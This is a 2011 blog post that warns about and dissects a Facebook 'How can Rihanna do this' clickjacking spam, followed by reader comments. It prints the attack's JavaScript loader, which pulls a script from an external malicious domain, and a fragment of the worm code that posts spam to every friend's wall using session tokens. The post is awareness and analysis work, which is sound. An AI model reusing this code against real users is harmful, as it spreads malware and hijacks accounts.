Wednesday, November 9, 2011

New "How Can Rihanna do this" Facebook Spam - Be aware!!




Hello friends. After several days finally a new spam has come out which floods from wall to wall. This time spammers have found out a new way to fool people and take them out of the secure zone and beat the same shit of redirecting them to a url that contains millions of viruses and malwares waiting to welcome you. I alone found of 36 different class of malwares uploaded on the infected link. Let us dig out deeper into this spam..Lets have some real fun. But do it at your own risk.



A special note for all Rihanna fans - she did nothing crap in public. So dont just go around and click everything on facebook.

The spam is again a wall flooder and it flows from wall to wall covering everyone in the friend list of the person who clicks it.

Let us check the spam closely. once you click the link then you will be redirected to a page that will ask you to click on a flash screen to verify that you are 18+ (well I dont think 18+ people are hardly interested in Rihanna) . Once you will click it, you will be presented with a 3 step process to click address bar and then press 'J' and then hit enter.


Here lies the trap. On pressing 'J' the "mouseonFocus=true" immideatly copies a javascript on your address bar. The js looks someting like this :
javascript:(a=(b=document).createElement('script')).src='http://reallyshocked.us/verify.js',b.body.appendChild(a);void(0)

 Now this javascript contains an external link code to all activities. Since facebook will prevent any malicious activity within its platform so once you run this js link the external link will get executed and will affect your wall. As a result you will paint your and your friends wall with a cool Rihanna spam.

A random math function starts picking up values and appends it in the url to add different session id's to every post so that facebook doesn't consider it as a spam. Well how did i find all this?? Here is the answer. Analyse the link that gets added in your address bar as soon as you press 'J' . There is a link to an external js file. You can view the malicious Js code by clicking here - code . (dont worry its harmless clicking here).
All those Rihanna fans who are afraid of clicking here, the following lines of code explains the whole process of extracting users from your friendlist and posting on their wall :


for (var i = 0; i < friends['length']; i++) {
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/profile/composer.php?__a=1';
    var paramswp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u2qr0v_15&xhpc_targetid=' + friends[i]['uid'] + '&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=Oh%20my%20god%2Ccheck%20this&xhpc_message=Oh%20my%20god%2Ccheck%20this&aktion=post&app_id=2309869772&attachment[params][0]=297811423571011&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320585896&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=' + user_id + '&';
    httpwp['open']('POST', urlwp, true);


The first line itself shows a for loop which is as bis as your friends list(bygod I loved this).


Well the story doesn't end here. Once you are done with "like this page" (some people have like-o-phobia) and all other stuff, you will be redirected to a virus and malware heavenly place. I dont know how many malwares and viruses are located at the link to which this application redirects us. My IDS almost died notifying me about it. THe redirection url is reallyshocked.us/ . Dont dare to open it (I am sure your system will be dead without protection) . This is a malicious crafted url which contains tons of malwares. I loved analysing each of them but soon got bored as I have a very important task to finish by tonight. In case you want to analyse it, just install SNORT and then open this url. It will capture all the malware activities and can provide you links to some porn and job search websites( what a combination).
Quiet an effort put up by smpammers this time to flood facebook. Hope facebook blocks this application soon. Hope you enjoyed reading it. Sorry to Rihanna Fans, as she did nothing CRAP.
Feel free to add your comments.


DARKLORD!!




8 comments:

  1. So I was spammed by this site too. And then I immediately realized my mistake and exited the page, went back to my wall to find people I have accidentally spam through the recent activities on my wall. But as I was doing this, my wallposts disappeared, all of them. I'm sure they're still there somewhere, just hidden from my wall because I can still look at my old pictures and notes, but on my wall it just says 'No older posts'. Can you please please help me out?

    ReplyDelete
  2. Abhinav.. thanks for the information..Could you write an article on BURP SUITE??
    i have problems with that.. :)

    ReplyDelete
  3. Actually facebook has taken action against this spam so they are deleting it from their platform and from all the walls where this has been posted. So if the spam has disappeared then dont worry..These are precaution steps taken by facebook..If its removed then no need to worry, and keep in mind for future that such spams are common on facebook.

    ReplyDelete
  4. so, if someone encounter this spam how could he fix it?

    ReplyDelete
  5. @pamm : the spam will automatically be deleted by Facebook once they recognize it.. Else you can manually delete all the spams that got accidently posted on your friends wall..

    ReplyDelete